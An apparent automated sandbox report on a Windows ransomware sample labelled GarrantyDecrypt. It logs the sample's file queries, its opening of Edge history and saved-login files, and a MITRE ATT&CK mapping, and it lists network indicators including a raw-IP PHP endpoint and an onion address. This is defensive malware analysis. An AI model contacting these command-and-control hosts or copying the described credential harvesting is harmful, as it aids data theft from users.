Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PreSignInSettingsConfig[1].json VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PreSignInSettingsConfig[1].json VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.29e797f3.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.3ce67b09.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.0eee61ec.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.45e00f56.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.a3fa76ae.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.5eee580c.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1002-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\resources.e1dabada.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-2246122658-3693405117-2476756634-1001-MergedResources-0.pri VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoIt3.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoIt3.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\HBtOiGTydevkvzVRvQJUwbiCuytmjHecpAIAwZYkf\UDeJwCQCrZFLkCPQcRnwCrmLG.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\HBtOiGTydevkvzVRvQJUwbiCuytmjHecpAIAwZYkf\UDeJwCQCrZFLkCPQcRnwCrmLG.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_helper.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\resources.pak VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msvcp140.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoshext.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msvcp140.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140_1.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\vcruntime140_1.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\amd64\FileSyncShell64.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\amd64\FileSyncShell64.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-shm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\Desktop\2b7cu0KwZl.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\Settings\settings.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\ntuser.dat.LOG1 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeQueries volume information: C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\HistoryJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\History-journalJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeFile opened: C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder		1
Registry Run Keys / Startup Folder		3
Masquerading		1
OS Credential Dumping		1
Security Software Discovery		1
Taint Shared Content		1
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network Medium2
Data Encrypted for Impact
CredentialsDomainsDefault AccountsScheduled Task/Job1
Bootkit		1
DLL Side-Loading		11
Virtualization/Sandbox Evasion		LSASS Memory11
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		3
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		Logon Script (Windows)1
Bootkit		Security Account Manager1
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
System Network Configuration Discovery		Distributed Component Object ModelInput Capture1
Proxy		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
File Deletion		LSA Secrets3
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
2b7cu0KwZl.exe47%ReversingLabsWin64.Ransomware.GarrantyDecrypt

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://api.ipify.org/60%Avira URL Cloudsafe
http://193.143.1.139/Ujdu8jjooue/biweax.php10%Avira URL Cloudsafe
http://193.143.1.139/9U60%Avira URL Cloudsafe
http://193.143.1.139/Ujdu8jjooue/biweax.php1y60%Avira URL Cloudsafe
http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO0%Avira URL Cloudsafe
http://193.143.1.139/0%Avira URL Cloudsafe
http://api.ipify.orgunknown------------------------multipart/form-data;0%Avira URL Cloudsafe
http://193.143.1.139/Ujdu8jjooue/biweax.php0%Avira URL Cloudsafe
http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl0%Avira URL Cloudsafe
http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
104.26.13.205
truefalse
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
